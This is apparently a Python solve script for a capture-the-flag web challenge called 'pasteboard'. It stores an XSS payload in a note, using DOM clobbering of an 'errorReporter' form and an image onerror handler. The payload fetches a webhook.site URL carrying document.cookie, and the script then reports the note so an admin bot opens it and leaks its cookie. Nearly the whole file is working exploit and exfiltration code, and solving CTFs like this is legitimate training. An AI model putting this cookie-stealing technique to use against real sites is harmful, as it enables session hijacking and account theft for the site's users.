import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# WINNING PAYLOAD: Same as test3 but grab document.cookie!
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/FLAG.js?cookie='+document.cookie+'&title='+document.title)"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

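print("[*] FINAL PAYLOAD - Getting document.cookie!")
print("[*] Using the EXACT method that worked for test3")
print()

# One Session is reused for both requests, so any cookie set by /note/new is
# sent along with the later /report call.
session = requests.Session()

# Store the payload as the body of a new note. Redirects are not followed
# because the note's path is read from the Location header of the response.
# requests has no default timeout; without one, an unresponsive server would
# hang the script indefinitely.
resp = session.post(
    BASE_URL + "/note/new",
    data={"title": "GET FLAG", "body": payload},
    allow_redirects=False,
    timeout=10,
)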

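# Note creation is treated as successful only on a 302 redirect; the redirect
# target is the path of the stored note.
if resp.status_code == 302:
    location = resp.headers.get('Location')
    if not location:
        # A 302 without a Location header would otherwise raise a TypeError
        # in the concatenation below.
        print("[-] Failed: 302 response without a Location header")
    else:
        # assumes Location is a path relative to BASE_URL -- TODO confirm
        note_url = BASE_URL + location

        print(f"[+] Created: {note_url}")
        print()

        # Hand the note's path to /report. Per the messages below, a bot is
        # expected to open the note afterwards; 202 is taken as "queued".
        # NOTE(review): on the defending side, a review bot fetching
        # third-party hosts right after opening a reported note is the
        # observable signal -- egress filtering on the bot limits it.
        report = session.post(
            BASE_URL + "/report",
            data={"url": location},
            timeout=10,  # requests never times out by default
        )
        if report.status_code == 202:
            print("[+] Reported to bot!")
            print()
            print("[*] Check webhook in 30-40 seconds for:")
            print("    /FLAG.js?cookie=<THE_FLAG>&title=...")
            print()
            print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
            print()
            print("[!] THE FLAG SHOULD BE IN THE 'cookie' QUERY PARAMETER!")
        else:
            print("[-] Report failed")
else:
    print(f"[-] Failed: {resp.status_code}")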
